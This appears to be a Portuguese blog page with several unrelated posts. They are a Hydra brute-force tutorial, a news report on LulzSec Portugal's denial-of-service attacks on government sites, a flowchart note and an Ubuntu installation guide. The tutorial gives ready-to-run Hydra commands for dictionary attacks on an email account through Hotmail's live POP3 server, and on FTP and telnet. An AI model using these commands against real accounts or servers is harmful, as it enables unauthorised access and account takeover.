  -l           #Utilizador a utilizar;

 -L           #Ficheiro com varios utilizadores a utilizar;

 -p          #Password a utilizar;

-P           #Ficheiro ou dicionário de passwords a utilizar;

  -e ns     #Informação adicional o “n” verifica se existe passwords nulas e o “s” experimenta o nome do utilizador como password;

  -C ficheiro         #Ficheiro com utilizadores e passwords em coluna com o seguinte formato: "login:pass" e um por linha, é usado em vês das opções –Le –P;

  -M ficheiro       #Lista de servidores para ataques paralelos, um por linha;

  -o ficheiro         #Escreve utilizadores e passwords encontrados para um ficheiro em vez do stdout que imprime na tela;

  -f          #Desconecta depois de encontrar o primeiro utilizador/password;

  -t TASKS            #Executa as tarefas conforme o numero de ligações em paralelo, o padrão são 16;

  -w tempo         #Define o tempo maximo de espera em segundos para responder, o padrao é 30;  

  -v / -V                                 #Modo detalhado;

  Servidor            #IP ou DNS do servidor alvo, pode-se usar a opção –M em substituição desta;   

  Service               “Serviço ou protocolo a atacar, temos os seguintes disponíveis:

telnet,  ftp,  pop3[-ntlm],   imap[-ntlm], smb, smbnt, http[s]-{head|get} , http-{get|post}-form , http-proxy,  cisco ,  cisco-enable,  vnc,  ldap2,  ldap3,  mssql,  mysql,  oracle-listener,  postgres,  nntp,  socks5,    rexec,  rlogin,  pcnfs,  snmp,  rsh,  cvs,  svn,  icq,  sapr3,  ssh2,  smtp-auth[-ntlm] , pcanywhere,   teamspeak,  sip,  vmauthd …

Exemplos : 



Neste exemplo vamos descobrir a password do email mrtcp-teste[at]live.com.pt usando o ataque de força bruta, este email é meu e foi criado previamente para este exemplo;

#hydra –S –v –l mrtcp-teste[at]live.com.pt–P /root/dic.dic pop3.live.com pop3

-S    -> Conecta por ligação segura;
-v    -> Modo detalhe, permite verificar as passwords mais facilmente;
-l   -> Email a descobrir a password;
-P  -> Directorio onde se encontra o dicionário a utilizar;
Pop3.live.com   -> Dns do servidor POP3 da Hotmail;
Pop3  -> Protocolo a ser utilizado, neste caso é o POP3;



#hydra ftp -l mrtcp -P /root/dic.txt -e ns -t 15 -f  



#hydra telnet -l mrtcp -P /root/dic.txt -e ns -t 15 -f



#hydra pop3.live.com pop3 -S -p 995 -l mrtcp@live.com..pt -P /pentest/passwords/wordlists/bt4-password.txt -e ns -t 15 -f -v


Brevemente mais protocolos


Hackers atacaram sites das Finanças, Administração Interna e PSP

Hackers tentaram atacar na quinta-feira os sites dos ministérios das Finanças e da Administração Interna e também da PSP. Segundo o PÚBLICO apurou, os hackerspertencem a movimentos anarquistas do Sul da Europa. Porém, o grupo Lulzsec Portugal reivindicou a autoria de dois dos ataques.

Segundo a informação dada ao PÚBLICO, as tentativas de atacar os sites terão traduzido um acto de solidariedade com grupos anarquistas portugueses que participaram na manifestação dos indignados, integrada na greve geral de quinta-feira.

Porém, o grupo anónimo Lulzsec Portugal – um grupo inspirado num colectivo internacional homónimo que ganhou notoriedade por atacar sites de grandes empresas e instituições –publicou várias mensagens no Twitter que indicam ter sido este grupo a conduzir dois dos ataques.

"Ataque começou, abram fogo: http://www.portaldasfinancas.gov.pt !", lê-se numa das mensagens, publicada esta quinta-feira. Duas horas depois, escreveram: "O Alvo será mudado para a psp devido às detenções nas manifestações. Ataque ao portal das finanças, terminado. Duração: 2 horas." É possível usar técnicas para tentar falsear a origem de um ataque informático.

Os três sites foram alvo de um tipo de ataques chamado negação de serviço. É um ataque tecnicamente simples, que consiste em bombardear um site com múltiplos pedidos de acesso, fazendo com que este se torne mais lento e, eventualmente, acabe por ficar inacessível.

A iniciativa dos "piratas informáticos" foi detectada atempadamente pela Unidade de Tecnologias de Informação de Segurança e a tentativa de entrada foi imediatamente barrada.

A Portugal Telecom foi chamada a intervir no contra-ataque aos hackers, ajustando a largura de banda.

Na noite de quinta-feira, um grupo de manifestantes do grupo dos chamados indignados entraram em confrontos com a polícia, frente à Assembleia da República, na sequência da manifestação integrada na greve geral.

Dos confrontos resultaram dois feridos - um agente da PSP e um repórter fotográfico. A PSP deteve sete manifestantes, um dos quais estrangeiro, segundo revelaram as autoridades policiais.

Notícia actualizada às 19h48
Acrescentada a reivindicação do grupo LulzSec Portugal e a informação de que se trataram de ataques de negação de serviço.

FOnte : Publico.pt


Exemplo de Fluxograma

Exemplo do raciocínio que se pode ter na detecção de avarias de CPU, RAM, MotherBoard

Isto não é um fluxograma para fazer um programa. Mas sim um fluxograma que mostra a sequência de raciocínio que se deve ter ao fazer um fluxograma.

É assim que se arquitectura um programa ou outro tipo de projecto ou objectivo a alcançar.


Guia de Instalação UBUNTU

Instalação Ubuntu

por inserir o Cd do Ubuntu na nossa drive. Damos um Boot pelo Cd e aparece a
imagem seguinte:

Depois clicamos F2 e escolhemos a linguagem de
instalação no nosso caso Português e clicamos Enter

Agora escolhemos Iniciar o Ubuntu

O Ubuntu começa a Iniciar…

Agora já temos o LiveCd a Correr vamos instalar o Ubuntu. No
canto superior esquerdo esta um ícone para [b]instalar[/b],
clicamos duas vezes sobre ele:

Escolhemos a nossa língua e clicamos Avançar

Escolhemos a nossa Localização e clicamos Avançar

Agora escolhemos o nosso tipo de Teclado e clicamos em Avançar

Agora vamos particionar o Disco

Escolhemos utilizar o Disco inteiro e clicamos em Avançar.

Agora e espera ate que a instalação acabe.